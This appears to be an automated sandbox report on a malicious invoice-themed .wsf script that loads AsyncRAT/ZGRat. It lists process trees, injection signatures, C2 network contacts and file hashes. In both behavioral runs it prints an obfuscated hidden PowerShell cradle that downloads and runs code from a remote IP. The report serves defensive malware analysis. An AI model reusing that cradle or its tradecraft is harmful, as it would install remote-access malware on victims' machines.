Malware Analysis Report

2025-08-10 19:35

Sample ID 231115-v6w45sec8w
Target 16112023_0136_15112023_Invoice#2356876431.wsf
SHA256 ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292
Tags
asyncrat zgrat sended@ rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292

Threat Level: Known bad

The file 16112023_0136_15112023_Invoice#2356876431.wsf was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat sended@ rat

Detect ZGRat V1

AsyncRat

ZGRat

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 17:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 17:36

Reported

2023-11-15 17:39

Platform

win7-20231020-en

Max time kernel

128s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

C:\Windows\system32\taskeng.exe

taskeng.exe {04BBFF73-310B-4225-8D31-ECFFDE1F3BAA} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Public\Conted.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"

Network

Country Destination Domain Proto
FR 185.81.157.213:222 185.81.157.213 tcp
FR 185.81.157.213:222 185.81.157.213 tcp

Files

memory/1976-7-0x000000001B440000-0x000000001B722000-memory.dmp

memory/1976-8-0x0000000001F90000-0x0000000001F98000-memory.dmp

memory/1976-9-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/1976-10-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/1976-11-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/1976-12-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/1976-13-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/1976-16-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

C:\Users\Public\Conted.vbs

MD5 110da9d3474ba64fa1a18c173685c25d
SHA1 9f093829518a9268bf9807fda7bef47e7832c497
SHA256 a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512 ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

C:\Users\Public\Conted.bat

MD5 759278dd3dc3679bf7efd1ec681c0aa1
SHA1 72b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256 cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA512 8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ac117302088a7284ccfb6957fc077861
SHA1 220d28d0668f1e28ac909561699636c848cd408e
SHA256 69154fb9bbdd28ec9c76d63ef9951ccb79ddcf4d37bb7e8d541a350ad979ab80
SHA512 f71021ad06ea17ddc3f619b196417afd96543a6613ff728038a588ba50651e434c6bb1f3c92f3e9d39fc0b401e7177e7dbcb222bccd93aa2caaca39d631865a4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZAWLLO1RJ69GAIO7DTX2.temp

MD5 d82ad5696b449dbe82226c731261a824
SHA1 385f9e07d795046e2d7ee64a8078166fb5a56326
SHA256 0b2fa9154e3620d3417a0adb0f90f530dc5d5866292a5bcaa3fbb50c41563348
SHA512 24721b2fb8fd37b0736ff97a6640647d17af6c05c928db8e1b816cda1ce2c706bb6ef53901565af2af44db1f1d289a1567cb39dd65deff7de6297bdc2f605aef

memory/2860-24-0x000007FEF4570000-0x000007FEF4F0D000-memory.dmp

memory/2860-25-0x0000000002490000-0x0000000002510000-memory.dmp

memory/2860-26-0x000007FEF4570000-0x000007FEF4F0D000-memory.dmp

memory/2860-27-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/2860-28-0x0000000002490000-0x0000000002510000-memory.dmp

memory/2860-29-0x0000000002620000-0x0000000002628000-memory.dmp

memory/2860-30-0x0000000002490000-0x0000000002510000-memory.dmp

memory/2860-31-0x000007FEF4570000-0x000007FEF4F0D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-15 17:36

Reported

2023-11-15 17:39

Platform

win10v2004-20231020-en

Max time kernel

148s

Max time network

160s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1976 set thread context of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 4292 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 4292 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 1624 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3400 wrote to memory of 1624 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1624 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
FR 185.81.157.213:222 185.81.157.213 tcp
US 8.8.8.8:53 213.157.81.185.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FR 185.81.157.213:222 185.81.157.213 tcp
US 8.8.8.8:53 198.52.96.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 135.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 32.144.221.88.in-addr.arpa udp
US 8.8.8.8:53 254.20.238.8.in-addr.arpa udp
US 8.8.8.8:53 192.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 hexrxr.duckdns.org udp
FR 185.81.157.213:6606 hexrxr.duckdns.org tcp

Files

memory/4292-3-0x0000024E33070000-0x0000024E33092000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_japlqqsa.qnw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4292-13-0x00007FFA40290000-0x00007FFA40D51000-memory.dmp

memory/4292-14-0x0000024E330C0000-0x0000024E330D0000-memory.dmp

memory/4292-15-0x0000024E330C0000-0x0000024E330D0000-memory.dmp

memory/4292-21-0x00007FFA40290000-0x00007FFA40D51000-memory.dmp

memory/4584-38-0x000002A3D1B40000-0x000002A3D1B50000-memory.dmp

memory/4584-54-0x000002A3D9E60000-0x000002A3D9E61000-memory.dmp

memory/4584-56-0x000002A3D9E90000-0x000002A3D9E91000-memory.dmp

memory/4584-57-0x000002A3D9E90000-0x000002A3D9E91000-memory.dmp

memory/4584-58-0x000002A3D9FA0000-0x000002A3D9FA1000-memory.dmp

C:\Users\Public\Conted.vbs

MD5 110da9d3474ba64fa1a18c173685c25d
SHA1 9f093829518a9268bf9807fda7bef47e7832c497
SHA256 a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512 ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

C:\Users\Public\Conted.bat

MD5 759278dd3dc3679bf7efd1ec681c0aa1
SHA1 72b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256 cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA512 8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/1976-62-0x00007FFA3F0E0000-0x00007FFA3FBA1000-memory.dmp

memory/1976-63-0x000001EC5F8D0000-0x000001EC5F8E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

C:\Users\Public\Conted.ps1

MD5 ba03b4e7a4ad2bd4a2f5bce388d8f489
SHA1 f71681ee8115d4349084ad5c26e790a926bbea84
SHA256 d6b98f02b41a30cd4578acfd549e2d6fe64036f00c1830193d342c0454068b5a
SHA512 6dc307567baa0a1def8b9e480477985ccbdb7e5628c4d972a5804b282006d0717ddd728c449f8fbfcd2669a1a868c516d5924ab3a1f3d1b8e4bd1272fc04c665

memory/1976-76-0x000001EC79C70000-0x000001EC79C8A000-memory.dmp

memory/3984-77-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1976-79-0x00007FFA3F0E0000-0x00007FFA3FBA1000-memory.dmp

memory/3984-80-0x0000000075020000-0x00000000757D0000-memory.dmp

memory/3984-81-0x00000000054D0000-0x00000000054E0000-memory.dmp

memory/3984-82-0x0000000005C90000-0x0000000006234000-memory.dmp

memory/3984-83-0x0000000005880000-0x0000000005912000-memory.dmp

memory/3984-84-0x0000000005810000-0x000000000581A000-memory.dmp

memory/3984-85-0x0000000005BE0000-0x0000000005C7C000-memory.dmp

memory/3984-86-0x0000000006380000-0x00000000063E6000-memory.dmp